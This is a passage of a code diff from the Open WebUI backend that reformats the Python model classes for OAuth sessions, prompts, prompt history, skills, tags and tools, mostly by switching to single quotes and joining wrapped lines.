get_sessions_by_user_id( results.append(OAuthSessionModel.model_validate(session)) except Exception as e: log.warning( - f"Skipping OAuth session {session.id} due to decryption failure, deleting corrupted session: {type(e).__name__}: {e}" + f'Skipping OAuth session {session.id} due to decryption failure, deleting corrupted session: {type(e).__name__}: {e}' ) db.query(OAuthSession).filter_by(id=session.id).delete() db.commit() return results except Exception as e: - log.error(f"Error getting OAuth sessions by user ID: {e}") + log.error(f'Error getting OAuth sessions by user ID: {e}') return [] def update_session_by_id( @@ -241,9 +231,9 @@ def update_session_by_id( db.query(OAuthSession).filter_by(id=session_id).update( { - "token": self._encrypt_token(token), - "expires_at": token.get("expires_at"), - "updated_at": current_time, + 'token': self._encrypt_token(token), + 'expires_at': token.get('expires_at'), + 'updated_at': current_time, } ) db.commit() @@ -256,46 +246,40 @@ def update_session_by_id( return None except Exception as e: - log.error(f"Error updating OAuth session tokens: {e}") + log.error(f'Error updating OAuth session tokens: {e}') return None - def delete_session_by_id( - self, session_id: str, db: Optional[Session] = None - ) -> bool: + def delete_session_by_id(self, session_id: str, db: Optional[Session] = None) -> bool: """Delete an OAuth session""" try: with get_db_context(db) as db: result = db.query(OAuthSession).filter_by(id=session_id).delete() db.commit() return result > 0 except Exception as e: - log.error(f"Error deleting OAuth session: {e}") + log.error(f'Error deleting OAuth session: {e}') return False - def delete_sessions_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> bool: + def delete_sessions_by_user_id(self, user_id: str, db: Optional[Session] = None) -> bool: """Delete all OAuth sessions for a user""" try: with get_db_context(db) as db: result = db.query(OAuthSession).filter_by(user_id=user_id).delete() db.commit() return True except Exception as e: - log.error(f"Error deleting OAuth sessions by user ID: {e}") + log.error(f'Error deleting OAuth sessions by user ID: {e}') return False - def delete_sessions_by_provider( - self, provider: str, db: Optional[Session] = None - ) -> bool: + def delete_sessions_by_provider(self, provider: str, db: Optional[Session] = None) -> bool: """Delete all OAuth sessions for a provider""" try: with get_db_context(db) as db: db.query(OAuthSession).filter_by(provider=provider).delete() db.commit() return True except Exception as e: - log.error(f"Error deleting OAuth sessions by provider {provider}: {e}") + log.error(f'Error deleting OAuth sessions by provider {provider}: {e}') return False
backend/open_webui/models/prompt_history.py+17 −31 modified@@ -19,7 +19,7 @@ class PromptHistory(Base): - __tablename__ = "prompt_history" + __tablename__ = 'prompt_history' id = Column(Text, primary_key=True) prompt_id = Column(Text, nullable=False, index=True) @@ -100,11 +100,7 @@ def get_history_by_prompt_id( return [ PromptHistoryResponse( **PromptHistoryModel.model_validate(entry).model_dump(), - user=( - users_dict.get(entry.user_id).model_dump() - if users_dict.get(entry.user_id) - else None - ), + user=(users_dict.get(entry.user_id).model_dump() if users_dict.get(entry.user_id) else None), ) for entry in entries ] @@ -116,9 +112,7 @@ def get_history_entry_by_id( ) -> Optional[PromptHistoryModel]: """Get a specific history entry by ID.""" with get_db_context(db) as db: - entry = ( - db.query(PromptHistory).filter(PromptHistory.id == history_id).first() - ) + entry = db.query(PromptHistory).filter(PromptHistory.id == history_id).first() if entry: return PromptHistoryModel.model_validate(entry) return None @@ -147,11 +141,7 @@ def get_history_count( ) -> int: """Get the number of history entries for a prompt.""" with get_db_context(db) as db: - return ( - db.query(PromptHistory) - .filter(PromptHistory.prompt_id == prompt_id) - .count() - ) + return db.query(PromptHistory).filter(PromptHistory.prompt_id == prompt_id).count() def compute_diff( self, @@ -161,9 +151,7 @@ def compute_diff( ) -> Optional[dict]: """Compute diff between two history entries.""" with get_db_context(db) as db: - from_entry = ( - db.query(PromptHistory).filter(PromptHistory.id == from_id).first() - ) + from_entry = db.query(PromptHistory).filter(PromptHistory.id == from_id).first() to_entry = db.query(PromptHistory).filter(PromptHistory.id == to_id).first() if not from_entry or not to_entry: @@ -173,26 +161,26 @@ def compute_diff( to_snapshot = to_entry.snapshot # Compute diff for content field - from_content = from_snapshot.get("content", "") - to_content = to_snapshot.get("content", "") + from_content = from_snapshot.get('content', '') + to_content = to_snapshot.get('content', '') diff_lines = list( difflib.unified_diff( from_content.splitlines(keepends=True), to_content.splitlines(keepends=True), - fromfile=f"v{from_id[:8]}", - tofile=f"v{to_id[:8]}", - lineterm="", + fromfile=f'v{from_id[:8]}', + tofile=f'v{to_id[:8]}', + lineterm='', ) ) return { - "from_id": from_id, - "to_id": to_id, - "from_snapshot": from_snapshot, - "to_snapshot": to_snapshot, - "content_diff": diff_lines, - "name_changed": from_snapshot.get("name") != to_snapshot.get("name"), + 'from_id': from_id, + 'to_id': to_id, + 'from_snapshot': from_snapshot, + 'to_snapshot': to_snapshot, + 'content_diff': diff_lines, + 'name_changed': from_snapshot.get('name') != to_snapshot.get('name'), } def delete_history_by_prompt_id( @@ -202,9 +190,7 @@ def delete_history_by_prompt_id( ) -> bool: """Delete all history entries for a prompt.""" with get_db_context(db) as db: - db.query(PromptHistory).filter( - PromptHistory.prompt_id == prompt_id - ).delete() + db.query(PromptHistory).filter(PromptHistory.prompt_id == prompt_id).delete() db.commit() return True
backend/open_webui/models/prompts.py+73 −121 modified@@ -19,7 +19,7 @@ class Prompt(Base): - __tablename__ = "prompt" + __tablename__ = 'prompt' id = Column(Text, primary_key=True) command = Column(String, unique=True, index=True) @@ -77,7 +77,6 @@ class PromptAccessListResponse(BaseModel): class PromptForm(BaseModel): - command: str name: str # Changed from title content: str @@ -91,24 +90,18 @@ class PromptForm(BaseModel): class PromptsTable: - def _get_access_grants( - self, prompt_id: str, db: Optional[Session] = None - ) -> list[AccessGrantModel]: - return AccessGrants.get_grants_by_resource("prompt", prompt_id, db=db) + def _get_access_grants(self, prompt_id: str, db: Optional[Session] = None) -> list[AccessGrantModel]: + return AccessGrants.get_grants_by_resource('prompt', prompt_id, db=db) def _to_prompt_model( self, prompt: Prompt, access_grants: Optional[list[AccessGrantModel]] = None, db: Optional[Session] = None, ) -> PromptModel: - prompt_data = PromptModel.model_validate(prompt).model_dump( - exclude={"access_grants"} - ) - prompt_data["access_grants"] = ( - access_grants - if access_grants is not None - else self._get_access_grants(prompt_data["id"], db=db) + prompt_data = PromptModel.model_validate(prompt).model_dump(exclude={'access_grants'}) + prompt_data['access_grants'] = ( + access_grants if access_grants is not None else self._get_access_grants(prompt_data['id'], db=db) ) return PromptModel.model_validate(prompt_data) @@ -135,34 +128,30 @@ def insert_new_prompt( try: with get_db_context(db) as db: - result = Prompt(**prompt.model_dump(exclude={"access_grants"})) + result = Prompt(**prompt.model_dump(exclude={'access_grants'})) db.add(result) db.commit() db.refresh(result) - AccessGrants.set_access_grants( - "prompt", prompt_id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('prompt', prompt_id, form_data.access_grants, db=db) if result: current_access_grants = self._get_access_grants(prompt_id, db=db) snapshot = { - "name": form_data.name, - "content": form_data.content, - "command": form_data.command, - "data": form_data.data or {}, - "meta": form_data.meta or {}, - "tags": form_data.tags or [], - "access_grants": [ - grant.model_dump() for grant in current_access_grants - ], + 'name': form_data.name, + 'content': form_data.content, + 'command': form_data.command, + 'data': form_data.data or {}, + 'meta': form_data.meta or {}, + 'tags': form_data.tags or [], + 'access_grants': [grant.model_dump() for grant in current_access_grants], } history_entry = PromptHistories.create_history_entry( prompt_id=prompt_id, snapshot=snapshot, user_id=user_id, parent_id=None, # Initial commit has no parent - commit_message=form_data.commit_message or "Initial version", + commit_message=form_data.commit_message or 'Initial version', db=db, ) @@ -178,9 +167,7 @@ def insert_new_prompt( except Exception: return None - def get_prompt_by_id( - self, prompt_id: str, db: Optional[Session] = None - ) -> Optional[PromptModel]: + def get_prompt_by_id(self, prompt_id: str, db: Optional[Session] = None) -> Optional[PromptModel]: """Get prompt by UUID.""" try: with get_db_context(db) as db: @@ -191,9 +178,7 @@ def get_prompt_by_id( except Exception: return None - def get_prompt_by_command( - self, command: str, db: Optional[Session] = None - ) -> Optional[PromptModel]: + def get_prompt_by_command(self, command: str, db: Optional[Session] = None) -> Optional[PromptModel]: try: with get_db_context(db) as db: prompt = db.query(Prompt).filter_by(command=command).first() @@ -205,21 +190,14 @@ def get_prompt_by_command( def get_prompts(self, db: Optional[Session] = None) -> list[PromptUserResponse]: with get_db_context(db) as db: - all_prompts = ( - db.query(Prompt) - .filter(Prompt.is_active == True) - .order_by(Prompt.updated_at.desc()) - .all() - ) + all_prompts = db.query(Prompt).filter(Prompt.is_active == True).order_by(Prompt.updated_at.desc()).all() user_ids = list(set(prompt.user_id for prompt in all_prompts)) prompt_ids = [prompt.id for prompt in all_prompts] users = Users.get_users_by_user_ids(user_ids, db=db) if user_ids else [] users_dict = {user.id: user for user in users} - grants_map = AccessGrants.get_grants_by_resources( - "prompt", prompt_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('prompt', prompt_ids, db=db) prompts = [] for prompt in all_prompts: @@ -232,28 +210,26 @@ def get_prompts(self, db: Optional[Session] = None) -> list[PromptUserResponse]: access_grants=grants_map.get(prompt.id, []), db=db, ).model_dump(), - "user": user.model_dump() if user else None, + 'user': user.model_dump() if user else None, } ) ) return prompts def get_prompts_by_user_id( - self, user_id: str, permission: str = "write", db: Optional[Session] = None + self, user_id: str, permission: str = 'write', db: Optional[Session] = None ) -> list[PromptUserResponse]: prompts = self.get_prompts(db=db) - user_group_ids = { - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - } + user_group_ids = {group.id for group in Groups.get_groups_by_member_id(user_id, db=db)} return [ prompt for prompt in prompts if prompt.user_id == user_id or AccessGrants.has_access( user_id=user_id, - resource_type="prompt", + resource_type='prompt', resource_id=prompt.id, permission=permission, user_group_ids=user_group_ids, @@ -276,22 +252,22 @@ def search_prompts( query = db.query(Prompt, User).outerjoin(User, User.id == Prompt.user_id) if filter: - query_key = filter.get("query") + query_key = filter.get('query') if query_key: query = query.filter( or_( - Prompt.name.ilike(f"%{query_key}%"), - Prompt.command.ilike(f"%{query_key}%"), - Prompt.content.ilike(f"%{query_key}%"), - User.name.ilike(f"%{query_key}%"), - User.email.ilike(f"%{query_key}%"), + Prompt.name.ilike(f'%{query_key}%'), + Prompt.command.ilike(f'%{query_key}%'), + Prompt.content.ilike(f'%{query_key}%'), + User.name.ilike(f'%{query_key}%'), + User.email.ilike(f'%{query_key}%'), ) ) - view_option = filter.get("view_option") - if view_option == "created": + view_option = filter.get('view_option') + if view_option == 'created': query = query.filter(Prompt.user_id == user_id) - elif view_option == "shared": + elif view_option == 'shared': query = query.filter(Prompt.user_id != user_id) # Apply access grant filtering @@ -300,32 +276,32 @@ def search_prompts( query=query, DocumentModel=Prompt, filter=filter, - resource_type="prompt", - permission="read", + resource_type='prompt', + permission='read', ) - tag = filter.get("tag") + tag = filter.get('tag') if tag: # Search for tag in JSON array field like_pattern = f'%"{tag.lower()}"%' tags_text = func.lower(cast(Prompt.tags, String)) query = query.filter(tags_text.like(like_pattern)) - order_by = filter.get("order_by") - direction = filter.get("direction") + order_by = filter.get('order_by') + direction = filter.get('direction') - if order_by == "name": - if direction == "asc": + if order_by == 'name': + if direction == 'asc': query = query.order_by(Prompt.name.asc()) else: query = query.order_by(Prompt.name.desc()) - elif order_by == "created_at": - if direction == "asc": + elif order_by == 'created_at': + if direction == 'asc': query = query.order_by(Prompt.created_at.asc()) else: query = query.order_by(Prompt.created_at.desc()) - elif order_by == "updated_at": - if direction == "asc": + elif order_by == 'updated_at': + if direction == 'asc': query = query.order_by(Prompt.updated_at.asc()) else: query = query.order_by(Prompt.updated_at.desc()) @@ -345,9 +321,7 @@ def search_prompts( items = query.all() prompt_ids = [prompt.id for prompt, _ in items] - grants_map = AccessGrants.get_grants_by_resources( - "prompt", prompt_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('prompt', prompt_ids, db=db) prompts = [] for prompt, user in items: @@ -358,11 +332,7 @@ def search_prompts( access_grants=grants_map.get(prompt.id, []), db=db, ).model_dump(), - user=( - UserResponse(**UserModel.model_validate(user).model_dump()) - if user - else None - ), + user=(UserResponse(**UserModel.model_validate(user).model_dump()) if user else None), ) ) @@ -381,9 +351,7 @@ def update_prompt_by_command( if not prompt: return None - latest_history = PromptHistories.get_latest_history_entry( - prompt.id, db=db - ) + latest_history = PromptHistories.get_latest_history_entry(prompt.id, db=db) parent_id = latest_history.id if latest_history else None current_access_grants = self._get_access_grants(prompt.id, db=db) @@ -401,24 +369,20 @@ def update_prompt_by_command( prompt.meta = form_data.meta or prompt.meta prompt.updated_at = int(time.time()) if form_data.access_grants is not None: - AccessGrants.set_access_grants( - "prompt", prompt.id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('prompt', prompt.id, form_data.access_grants, db=db) current_access_grants = self._get_access_grants(prompt.id, db=db) db.commit() # Create history entry only if content changed if content_changed: snapshot = { - "name": form_data.name, - "content": form_data.content, - "command": command, - "data": form_data.data or {}, - "meta": form_data.meta or {}, - "access_grants": [ - grant.model_dump() for grant in current_access_grants - ], + 'name': form_data.name, + 'content': form_data.content, + 'command': command, + 'data': form_data.data or {}, + 'meta': form_data.meta or {}, + 'access_grants': [grant.model_dump() for grant in current_access_grants], } history_entry = PromptHistories.create_history_entry( @@ -452,9 +416,7 @@ def update_prompt_by_id( if not prompt: return None - latest_history = PromptHistories.get_latest_history_entry( - prompt.id, db=db - ) + latest_history = PromptHistories.get_latest_history_entry(prompt.id, db=db) parent_id = latest_history.id if latest_history else None current_access_grants = self._get_access_grants(prompt.id, db=db) @@ -478,9 +440,7 @@ def update_prompt_by_id( prompt.tags = form_data.tags if form_data.access_grants is not None: - AccessGrants.set_access_grants( - "prompt", prompt.id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('prompt', prompt.id, form_data.access_grants, db=db) current_access_grants = self._get_access_grants(prompt.id, db=db) prompt.updated_at = int(time.time()) @@ -490,15 +450,13 @@ def update_prompt_by_id( # Create history entry only if content changed if content_changed: snapshot = { - "name": form_data.name, - "content": form_data.content, - "command": prompt.command, - "data": form_data.data or {}, - "meta": form_data.meta or {}, - "tags": prompt.tags or [], - "access_grants": [ - grant.model_dump() for grant in current_access_grants - ], + 'name': form_data.name, + 'content': form_data.content, + 'command': prompt.command, + 'data': form_data.data or {}, + 'meta': form_data.meta or {}, + 'tags': prompt.tags or [], + 'access_grants': [grant.model_dump() for grant in current_access_grants], } history_entry = PromptHistories.create_history_entry( @@ -560,21 +518,19 @@ def update_prompt_version( if not prompt: return None - history_entry = PromptHistories.get_history_entry_by_id( - version_id, db=db - ) + history_entry = PromptHistories.get_history_entry_by_id(version_id, db=db) if not history_entry: return None # Restore prompt content from the snapshot snapshot = history_entry.snapshot if snapshot: - prompt.name = snapshot.get("name", prompt.name) - prompt.content = snapshot.get("content", prompt.content) - prompt.data = snapshot.get("data", prompt.data) - prompt.meta = snapshot.get("meta", prompt.meta) - prompt.tags = snapshot.get("tags", prompt.tags) + prompt.name = snapshot.get('name', prompt.name) + prompt.content = snapshot.get('content', prompt.content) + prompt.data = snapshot.get('data', prompt.data) + prompt.meta = snapshot.get('meta', prompt.meta) + prompt.tags = snapshot.get('tags', prompt.tags) # Note: command and access_grants are not restored from snapshot prompt.version_id = version_id @@ -585,9 +541,7 @@ def update_prompt_version( except Exception: return None - def toggle_prompt_active( - self, prompt_id: str, db: Optional[Session] = None - ) -> Optional[PromptModel]: + def toggle_prompt_active(self, prompt_id: str, db: Optional[Session] = None) -> Optional[PromptModel]: """Toggle the is_active flag on a prompt.""" try: with get_db_context(db) as db: @@ -602,16 +556,14 @@ def toggle_prompt_active( except Exception: return None - def delete_prompt_by_command( - self, command: str, db: Optional[Session] = None - ) -> bool: + def delete_prompt_by_command(self, command: str, db: Optional[Session] = None) -> bool: """Permanently delete a prompt and its history.""" try: with get_db_context(db) as db: prompt = db.query(Prompt).filter_by(command=command).first() if prompt: PromptHistories.delete_history_by_prompt_id(prompt.id, db=db) - AccessGrants.revoke_all_access("prompt", prompt.id, db=db) + AccessGrants.revoke_all_access('prompt', prompt.id, db=db) db.delete(prompt) db.commit() @@ -627,7 +579,7 @@ def delete_prompt_by_id(self, prompt_id: str, db: Optional[Session] = None) -> b prompt = db.query(Prompt).filter_by(id=prompt_id).first() if prompt: PromptHistories.delete_history_by_prompt_id(prompt.id, db=db) - AccessGrants.revoke_all_access("prompt", prompt.id, db=db) + AccessGrants.revoke_all_access('prompt', prompt.id, db=db) db.delete(prompt) db.commit()
backend/open_webui/models/skills.py+40 −68 modified@@ -19,7 +19,7 @@ class Skill(Base): - __tablename__ = "skill" + __tablename__ = 'skill' id = Column(String, primary_key=True, unique=True) user_id = Column(String) @@ -77,7 +77,7 @@ class SkillResponse(BaseModel): class SkillUserResponse(SkillResponse): user: Optional[UserResponse] = None - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class SkillAccessResponse(SkillUserResponse): @@ -105,24 +105,18 @@ class SkillAccessListResponse(BaseModel): class SkillsTable: - def _get_access_grants( - self, skill_id: str, db: Optional[Session] = None - ) -> list[AccessGrantModel]: - return AccessGrants.get_grants_by_resource("skill", skill_id, db=db) + def _get_access_grants(self, skill_id: str, db: Optional[Session] = None) -> list[AccessGrantModel]: + return AccessGrants.get_grants_by_resource('skill', skill_id, db=db) def _to_skill_model( self, skill: Skill, access_grants: Optional[list[AccessGrantModel]] = None, db: Optional[Session] = None, ) -> SkillModel: - skill_data = SkillModel.model_validate(skill).model_dump( - exclude={"access_grants"} - ) - skill_data["access_grants"] = ( - access_grants - if access_grants is not None - else self._get_access_grants(skill_data["id"], db=db) + skill_data = SkillModel.model_validate(skill).model_dump(exclude={'access_grants'}) + skill_data['access_grants'] = ( + access_grants if access_grants is not None else self._get_access_grants(skill_data['id'], db=db) ) return SkillModel.model_validate(skill_data) @@ -136,39 +130,33 @@ def insert_new_skill( try: result = Skill( **{ - **form_data.model_dump(exclude={"access_grants"}), - "user_id": user_id, - "updated_at": int(time.time()), - "created_at": int(time.time()), + **form_data.model_dump(exclude={'access_grants'}), + 'user_id': user_id, + 'updated_at': int(time.time()), + 'created_at': int(time.time()), } ) db.add(result) db.commit() db.refresh(result) - AccessGrants.set_access_grants( - "skill", result.id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('skill', result.id, form_data.access_grants, db=db) if result: return self._to_skill_model(result, db=db) else: return None except Exception as e: - log.exception(f"Error creating a new skill: {e}") + log.exception(f'Error creating a new skill: {e}') return None - def get_skill_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[SkillModel]: + def get_skill_by_id(self, id: str, db: Optional[Session] = None) -> Optional[SkillModel]: try: with get_db_context(db) as db: skill = db.get(Skill, id) return self._to_skill_model(skill, db=db) if skill else None except Exception: return None - def get_skill_by_name( - self, name: str, db: Optional[Session] = None - ) -> Optional[SkillModel]: + def get_skill_by_name(self, name: str, db: Optional[Session] = None) -> Optional[SkillModel]: try: with get_db_context(db) as db: skill = db.query(Skill).filter_by(name=name).first() @@ -185,7 +173,7 @@ def get_skills(self, db: Optional[Session] = None) -> list[SkillUserModel]: users = Users.get_users_by_user_ids(user_ids, db=db) if user_ids else [] users_dict = {user.id: user for user in users} - grants_map = AccessGrants.get_grants_by_resources("skill", skill_ids, db=db) + grants_map = AccessGrants.get_grants_by_resources('skill', skill_ids, db=db) skills = [] for skill in all_skills: @@ -198,27 +186,25 @@ def get_skills(self, db: Optional[Session] = None) -> list[SkillUserModel]: access_grants=grants_map.get(skill.id, []), db=db, ).model_dump(), - "user": user.model_dump() if user else None, + 'user': user.model_dump() if user else None, } ) ) return skills def get_skills_by_user_id( - self, user_id: str, permission: str = "write", db: Optional[Session] = None + self, user_id: str, permission: str = 'write', db: Optional[Session] = None ) -> list[SkillUserModel]: skills = self.get_skills(db=db) - user_group_ids = { - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - } + user_group_ids = {group.id for group in Groups.get_groups_by_member_id(user_id, db=db)} return [ skill for skill in skills if skill.user_id == user_id or AccessGrants.has_access( user_id=user_id, - resource_type="skill", + resource_type='skill', resource_id=skill.id, permission=permission, user_group_ids=user_group_ids, @@ -242,22 +228,22 @@ def search_skills( query = db.query(Skill, User).outerjoin(User, User.id == Skill.user_id) if filter: - query_key = filter.get("query") + query_key = filter.get('query') if query_key: query = query.filter( or_( - Skill.name.ilike(f"%{query_key}%"), - Skill.description.ilike(f"%{query_key}%"), - Skill.id.ilike(f"%{query_key}%"), - User.name.ilike(f"%{query_key}%"), - User.email.ilike(f"%{query_key}%"), + Skill.name.ilike(f'%{query_key}%'), + Skill.description.ilike(f'%{query_key}%'), + Skill.id.ilike(f'%{query_key}%'), + User.name.ilike(f'%{query_key}%'), + User.email.ilike(f'%{query_key}%'), ) ) - view_option = filter.get("view_option") - if view_option == "created": + view_option = filter.get('view_option') + if view_option == 'created': query = query.filter(Skill.user_id == user_id) - elif view_option == "shared": + elif view_option == 'shared': query = query.filter(Skill.user_id != user_id) # Apply access grant filtering @@ -266,8 +252,8 @@ def search_skills( query=query, DocumentModel=Skill, filter=filter, - resource_type="skill", - permission="read", + resource_type='skill', + permission='read', ) query = query.order_by(Skill.updated_at.desc()) @@ -283,9 +269,7 @@ def search_skills( items = query.all() skill_ids = [skill.id for skill, _ in items] - grants_map = AccessGrants.get_grants_by_resources( - "skill", skill_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('skill', skill_ids, db=db) skills = [] for skill, user in items: @@ -296,43 +280,31 @@ def search_skills( access_grants=grants_map.get(skill.id, []), db=db, ).model_dump(), - user=( - UserResponse( - **UserModel.model_validate(user).model_dump() - ) - if user - else None - ), + user=(UserResponse(**UserModel.model_validate(user).model_dump()) if user else None), ) ) return SkillListResponse(items=skills, total=total) except Exception as e: - log.exception(f"Error searching skills: {e}") + log.exception(f'Error searching skills: {e}') return SkillListResponse(items=[], total=0) - def update_skill_by_id( - self, id: str, updated: dict, db: Optional[Session] = None - ) -> Optional[SkillModel]: + def update_skill_by_id(self, id: str, updated: dict, db: Optional[Session] = None) -> Optional[SkillModel]: try: with get_db_context(db) as db: - access_grants = updated.pop("access_grants", None) - db.query(Skill).filter_by(id=id).update( - {**updated, "updated_at": int(time.time())} - ) + access_grants = updated.pop('access_grants', None) + db.query(Skill).filter_by(id=id).update({**updated, 'updated_at': int(time.time())}) db.commit() if access_grants is not None: - AccessGrants.set_access_grants("skill", id, access_grants, db=db) + AccessGrants.set_access_grants('skill', id, access_grants, db=db) skill = db.query(Skill).get(id) db.refresh(skill) return self._to_skill_model(skill, db=db) except Exception: return None - def toggle_skill_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[SkillModel]: + def toggle_skill_by_id(self, id: str, db: Optional[Session] = None) -> Optional[SkillModel]: with get_db_context(db) as db: try: skill = db.query(Skill).filter_by(id=id).first() @@ -351,7 +323,7 @@ def toggle_skill_by_id( def delete_skill_by_id(self, id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - AccessGrants.revoke_all_access("skill", id, db=db) + AccessGrants.revoke_all_access('skill', id, db=db) db.query(Skill).filter_by(id=id).delete() db.commit()
backend/open_webui/models/tags.py+25 −53 modified@@ -17,19 +17,19 @@ # Tag DB Schema #################### class Tag(Base): - __tablename__ = "tag" + __tablename__ = 'tag' id = Column(String) name = Column(String) user_id = Column(String) meta = Column(JSON, nullable=True) __table_args__ = ( - PrimaryKeyConstraint("id", "user_id", name="pk_id_user_id"), - Index("user_id_idx", "user_id"), + PrimaryKeyConstraint('id', 'user_id', name='pk_id_user_id'), + Index('user_id_idx', 'user_id'), ) # Unique constraint ensuring (id, user_id) is unique, not just the `id` column - __table_args__ = (PrimaryKeyConstraint("id", "user_id", name="pk_id_user_id"),) + __table_args__ = (PrimaryKeyConstraint('id', 'user_id', name='pk_id_user_id'),) class TagModel(BaseModel): @@ -51,12 +51,10 @@ class TagChatIdForm(BaseModel): class TagTable: - def insert_new_tag( - self, name: str, user_id: str, db: Optional[Session] = None - ) -> Optional[TagModel]: + def insert_new_tag(self, name: str, user_id: str, db: Optional[Session] = None) -> Optional[TagModel]: with get_db_context(db) as db: - id = name.replace(" ", "_").lower() - tag = TagModel(**{"id": id, "user_id": user_id, "name": name}) + id = name.replace(' ', '_').lower() + tag = TagModel(**{'id': id, 'user_id': user_id, 'name': name}) try: result = Tag(**tag.model_dump()) db.add(result) @@ -67,89 +65,63 @@ def insert_new_tag( else: return None except Exception as e: - log.exception(f"Error inserting a new tag: {e}") + log.exception(f'Error inserting a new tag: {e}') return None - def get_tag_by_name_and_user_id( - self, name: str, user_id: str, db: Optional[Session] = None - ) -> Optional[TagModel]: + def get_tag_by_name_and_user_id(self, name: str, user_id: str, db: Optional[Session] = None) -> Optional[TagModel]: try: - id = name.replace(" ", "_").lower() + id = name.replace(' ', '_').lower() with get_db_context(db) as db: tag = db.query(Tag).filter_by(id=id, user_id=user_id).first() return TagModel.model_validate(tag) except Exception: return None - def get_tags_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> list[TagModel]: + def get_tags_by_user_id(self, user_id: str, db: Optional[Session] = None) -> list[TagModel]: with get_db_context(db) as db: - return [ - TagModel.model_validate(tag) - for tag in (db.query(Tag).filter_by(user_id=user_id).all()) - ] + return [TagModel.model_validate(tag) for tag in (db.query(Tag).filter_by(user_id=user_id).all())] - def get_tags_by_ids_and_user_id( - self, ids: list[str], user_id: str, db: Optional[Session] = None - ) -> list[TagModel]: + def get_tags_by_ids_and_user_id(self, ids: list[str], user_id: str, db: Optional[Session] = None) -> list[TagModel]: with get_db_context(db) as db: return [ TagModel.model_validate(tag) - for tag in ( - db.query(Tag).filter(Tag.id.in_(ids), Tag.user_id == user_id).all() - ) + for tag in (db.query(Tag).filter(Tag.id.in_(ids), Tag.user_id == user_id).all()) ] - def delete_tag_by_name_and_user_id( - self, name: str, user_id: str, db: Optional[Session] = None - ) -> bool: + def delete_tag_by_name_and_user_id(self, name: str, user_id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - id = name.replace(" ", "_").lower() + id = name.replace(' ', '_').lower() res = db.query(Tag).filter_by(id=id, user_id=user_id).delete() - log.debug(f"res: {res}") + log.debug(f'res: {res}') db.commit() return True except Exception as e: - log.error(f"delete_tag: {e}") + log.error(f'delete_tag: {e}') return False - def delete_tags_by_ids_and_user_id( - self, ids: list[str], user_id: str, db: Optional[Session] = None - ) -> bool: + def delete_tags_by_ids_and_user_id(self, ids: list[str], user_id: str, db: Optional[Session] = None) -> bool: """Delete all tags whose id is in *ids* for the given user, in one query.""" if not ids: return True try: with get_db_context(db) as db: - db.query(Tag).filter(Tag.id.in_(ids), Tag.user_id == user_id).delete( - synchronize_session=False - ) + db.query(Tag).filter(Tag.id.in_(ids), Tag.user_id == user_id).delete(synchronize_session=False) db.commit() return True except Exception as e: - log.error(f"delete_tags_by_ids: {e}") + log.error(f'delete_tags_by_ids: {e}') return False - def ensure_tags_exist( - self, names: list[str], user_id: str, db: Optional[Session] = None - ) -> None: + def ensure_tags_exist(self, names: list[str], user_id: str, db: Optional[Session] = None) -> None: """Create tag rows for any *names* that don't already exist for *user_id*.""" if not names: return - ids = [n.replace(" ", "_").lower() for n in names] + ids = [n.replace(' ', '_').lower() for n in names] with get_db_context(db) as db: - existing = { - t.id - for t in db.query(Tag.id) - .filter(Tag.id.in_(ids), Tag.user_id == user_id) - .all() - } + existing = {t.id for t in db.query(Tag.id).filter(Tag.id.in_(ids), Tag.user_id == user_id).all()} new_tags = [ - Tag(id=tag_id, name=name, user_id=user_id) - for tag_id, name in zip(ids, names) - if tag_id not in existing + Tag(id=tag_id, name=name, user_id=user_id) for tag_id, name in zip(ids, names) if tag_id not in existing ] if new_tags: db.add_all(new_tags)
backend/open_webui/models/tools.py+45 −73 modified@@ -19,7 +19,7 @@ class Tool(Base): - __tablename__ = "tool" + __tablename__ = 'tool' id = Column(String, primary_key=True, unique=True) user_id = Column(String) @@ -75,7 +75,7 @@ class ToolResponse(BaseModel): class ToolUserResponse(ToolResponse): user: Optional[UserResponse] = None - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class ToolAccessResponse(ToolUserResponse): @@ -95,22 +95,18 @@ class ToolValves(BaseModel): class ToolsTable: - def _get_access_grants( - self, tool_id: str, db: Optional[Session] = None - ) -> list[AccessGrantModel]: - return AccessGrants.get_grants_by_resource("tool", tool_id, db=db) + def _get_access_grants(self, tool_id: str, db: Optional[Session] = None) -> list[AccessGrantModel]: + return AccessGrants.get_grants_by_resource('tool', tool_id, db=db) def _to_tool_model( self, tool: Tool, access_grants: Optional[list[AccessGrantModel]] = None, db: Optional[Session] = None, ) -> ToolModel: - tool_data = ToolModel.model_validate(tool).model_dump(exclude={"access_grants"}) - tool_data["access_grants"] = ( - access_grants - if access_grants is not None - else self._get_access_grants(tool_data["id"], db=db) + tool_data = ToolModel.model_validate(tool).model_dump(exclude={'access_grants'}) + tool_data['access_grants'] = ( + access_grants if access_grants is not None else self._get_access_grants(tool_data['id'], db=db) ) return ToolModel.model_validate(tool_data) @@ -125,40 +121,34 @@ def insert_new_tool( try: result = Tool( **{ - **form_data.model_dump(exclude={"access_grants"}), - "specs": specs, - "user_id": user_id, - "updated_at": int(time.time()), - "created_at": int(time.time()), + **form_data.model_dump(exclude={'access_grants'}), + 'specs': specs, + 'user_id': user_id, + 'updated_at': int(time.time()), + 'created_at': int(time.time()), } ) db.add(result) db.commit() db.refresh(result) - AccessGrants.set_access_grants( - "tool", result.id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('tool', result.id, form_data.access_grants, db=db) if result: return self._to_tool_model(result, db=db) else: return None except Exception as e: - log.exception(f"Error creating a new tool: {e}") + log.exception(f'Error creating a new tool: {e}') return None - def get_tool_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[ToolModel]: + def get_tool_by_id(self, id: str, db: Optional[Session] = None) -> 